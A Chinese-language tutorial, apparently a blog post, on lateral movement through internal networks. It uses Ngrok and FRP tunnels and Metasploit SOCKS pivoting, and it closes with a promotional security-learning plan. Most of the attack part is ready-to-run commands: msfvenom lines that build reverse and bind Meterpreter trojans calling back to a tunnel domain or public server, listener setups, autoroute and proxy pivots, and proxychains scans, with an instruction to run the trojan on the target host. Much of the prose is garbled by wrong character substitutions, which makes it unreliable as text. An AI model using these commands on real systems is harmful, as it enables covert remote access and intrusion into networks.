内网安全：Socks 代理 -- 本地代理 技术.

内网安全：Socks 代理 || 本地代理 技术.

Socks

代理又称全能代理，就像有许多跳线的转接板，它只是简单地将一端的系统连接到另外一端。支持多种协议，包罗http、ftp哀求及其它范例的哀求。它分socks 4
和socks 5两种范例，socks 4只支持TCP协议而socks 5支持TCP/UDP协议，还支持各种身份验证机制等协议。其标准端口为1080.

---

目次：

内网安全：Socks 代理 技术.
两个内网通讯上线（ Ngrok ）
（1）开通隧道：
（2）下载客户端：
（3）生成一个程序后门：
（4）举行监听：（kali）
两个内网通讯上线（ Frp 自建跳板 ）
（1）跳板环境搭建：
（2）生成程序后面：
（3）举行监听：（kali）
本地代理：（ MSF 跳板多个内网主机系列）
第二层内网代理：
（1）信息网络及设置访问：
（2）开启本地代理：
（3）内网扫描：
（4）浏览器访问：
第三层内网代理：
（1）生成正向程序后门：
（2）举行监听：
（3）信息网络及设置访问：
（4）开启本地代理：
第四层内网渗透：
（1）生成正向程序后门：
（2）举行监听：

---

1. 代理解决的问题：（1）内网有外网    （2）内网有过滤    （3）内网无外网

复制代码

---

两个内网通讯上线（ Ngrok ）

1. 开通隧道工具：https://www.ngrok.cc/user.html
4. 理解：二个内网主机不能相互连接的，这样就可以通过开通的隧道进行连接.
5. （开通的隧道就是在外网开通一个域名：当目标访问这个域名，则会将数据返还回来到kali中）

复制代码

（1）开通隧道：

---

（2）下载客户端：

1. 解压放到 kali 中：（切换的刚刚下载的文件目录中）
3. （1）./sunny clientid 115735315695        // 执行
5.     ./sunny clientid 隧道的IP

复制代码

---

（3）生成一个程序后门：（木马）

1. msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe

复制代码

---

（4）举行监听：（kali）

1. （1）msfconsole
3. （2）use exploit/multi/handler
5. （3）set payload windows/meterpreter/reverse_http
7. （4）set lhost 192.168.0.106        // 本地的 IP 地址
9. （5）set lport 4444                 // 本地的 端口.
11. （6）exploit

复制代码

---

两个内网通讯上线（ Frp 自建跳板 ）

（1）跳板环境 搭建：

1. 需要有自己的服务器，有来搭建跳板.
4. 【服务器 和 控制端】需要下载的工具：https://github.com/fatedier/frp/releases

复制代码

1. 服务器修改配置文件 frps.ini：
2. [common]
3. bind_port = 6677            // 这个端口修改为 服务器 开放的就行
5. 启动服务端：【切换在下载的目录并执行】
6. ./frps -c ./frps.ini
9. 控制端修改配置文件 frpc.ini：
10. [common]
11. server_addr = 云主机 IP 地址
12. server_port = 6677                 // frpc 工作端口，必须和上面 frps 保持一致
13. [msf]
14. type = tcp
15. local_ip = 127.0.0.1
16. local_port = 5555                  // 转发给本机的 5555
17. remote_port = 6000                 // 服务端用 6000 端口转发给本机
19. 启动客户端：【切换在下载的目录并执行】
20. ./frpc -c ./frpc.ini

复制代码

---

（2）生成程序后面：（木马）

1. msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器（公网）的IP地址 lport=6000 -f exe -o frp.exe

复制代码

---

（3）举行监听：（kali）

1. （1）msfconsole
3. （2）use exploit/multi/handler
5. （3）set payload windows/meterpreter/reverse_tcp
7. （4）set LHOST 127.0.0.1   
9. （5）set LPORT 5555        // 本机监听的端口【和控制端的一样】
11. （6）exploit
13. 然后把程序后门（木马）放在目标主机上执行就行.

复制代码

---

本地代理：（ MSF 跳板多个内网主机系列）

第二层内网代理：

（1）信息网络及设置访问：

1. （1）run get_local_subnets            // 获取网络接口
3. （2）run autoroute -p                 // 查看路由地址
5. （3）run autoroute -s 10.0.20.0/24    // 添加地二层内网的路由网段.
7. 或
9. （3）run post/multi/manage/autoroute        // 自动添加，目前所有路由网段

复制代码

---

（2）开启本地代理：

1. background                            // 挂起会话
3. 如果是msf6，使用代理模板为：
5. use auxiliary/server/socks_proxy
7. 如果是msf5，使用代理模板为：
9. use auxiliary/server/socks4a
12. （1）set srvport 2222        // 设置本地代理端口为2222
14. （2）exploit                 // 运行

复制代码

---

（3）内网扫描：

1. 打开 /etc/proxychains4.conf 文件：
3. socks4 192.168.0.106 2222                // 添加 本地的代理和端口

复制代码

1. 进行扫描：
3. proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80
5. -Pn：扫描主机检测其是否受到数据包过滤软件或防火墙的保护.
7. -sT：扫描 TCP 数据包已建立的连接 connect

复制代码

---

（4）浏览器访问：

---

第三层内网代理：

（1）生成正向程序后门：

1. msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe

复制代码

---

（2）举行监听：

1. 要在和上面一样的 msf 会话中执行.
3. （1）use exploit/multi/handler   
5. （2）set payload windows/x64/meterpreter/bind_tcp
7. （3）set rhost 10.0.20.99                // 第二层内网的 IP 地址
9. （4）set lport 54321                     // 和程序后面（木马）一样的端口
11. （5）exploit

复制代码

---

（3）信息网络及设置访问：

1. （1）run get_local_subnets            // 获取网络接口
3. （2）run autoroute -p                 // 查看路由地址
5. （3）run post/multi/manage/autoroute        // 自动添加，目前所有路由网段.

复制代码

---

（4）开启本地代理：

1. background                            // 挂起会话
3. 如果是msf6，使用代理模板为：
5. use auxiliary/server/socks_proxy
7. 如果是msf5，使用代理模板为：
9. use auxiliary/server/socks4a

复制代码

1. （1）set srvport 6666        // 默认端口6666
3. （2）exploit                 // 运行

复制代码

---

第四层内网渗透：

（1）生成正向程序后门：

1. msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe

复制代码

---

（2）举行监听：

1. 要在和上面一样的 msf 会话中执行.
3. （1）use exploit/multi/handler   
5. （2）set payload windows/x64/meterpreter/bind_tcp
7. （3）set rhost 10.0.10.110                // 第二层内网的 IP 地址
9. （4）set lport 9876                     // 和程序后面（木马）一样的端口
11. （5）exploit

复制代码

学习链接：第70天：内网安全-
域横向内网周游Socks代理隧道技术_哔哩哔哩_bilibili
接下来我将给各位同砚划分一张学习计划表！
学习计划

那么题目又来了，作为萌新小白，我应该先学什么，再学什么？
既然你都问的这么直白了，我就告诉你，零底子应该从什么开始学起：
阶段一：初级网络安全工程师

接下来我将给各人安排一个为期1个月的网络安全初级计划，当你学完后，你基本可以从事一份网络安全干系的工作，比如渗透测试、Web渗透、安全服务、安全分析等岗位；其中，如果你等保模块学的好，还可以从事等保工程师。
综合薪资区间6k~15k
1、网络安全理论知识（2天）
①相识行业干系背景，前景，确定发展方向。
②学习网络安全干系法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）
2、渗透测试底子（1周）
①渗透测试的流程、分类、标准
②信息网络技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统底子（1周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固底子）
4、计算机网络底子（1周）
①计算机网络底子、协议和架构
②网络通信原理、OSI模子、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库底子操作（2天）
①数据库底子
②SQL语言底子
③数据库安全加固
6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

那么，到此为止，已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗？
阶段二：中级or高级网络安全工程师（看自己本领）

综合薪资区间15k~30k
7、脚本编程学习（4周）
在网络安全领域。是否具备编程本领是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时间，每每必要对现有工具举行扩展，或者编写符合我们要求的工具、自动化脚本，这个时间就必要具备一定的编程本领。在分秒必争的CTF竞赛中，想要高效地利用自制的脚本工具来实现各种目的，更是必要拥有编程本领。
零底子入门的同砚，我发起选择脚本语言Python/PHP/Go/Java中的一种，对常用库举行编程学习
搭建开辟环境和选择IDE，PHP环境保举Wamp和XAMPP，IDE强烈保举Sublime；
Python编程学习，学习内容包含：语法、正则、文件、 网络、多线程等常用库，保举《Python焦点编程》，没必要看完
用Python编写漏洞的exp,然后写一个简单的网络爬虫
PHP基本语法学习并书写一个简单的博客系统
认识MVC架构，并试着学习一个PHP框架或者Python框架 (可选)
相识Bootstrap的结构或者CSS。
阶段三：顶级网络安全工程师

如果你对网络安全入门感兴趣，那么你必要的话可以点击这里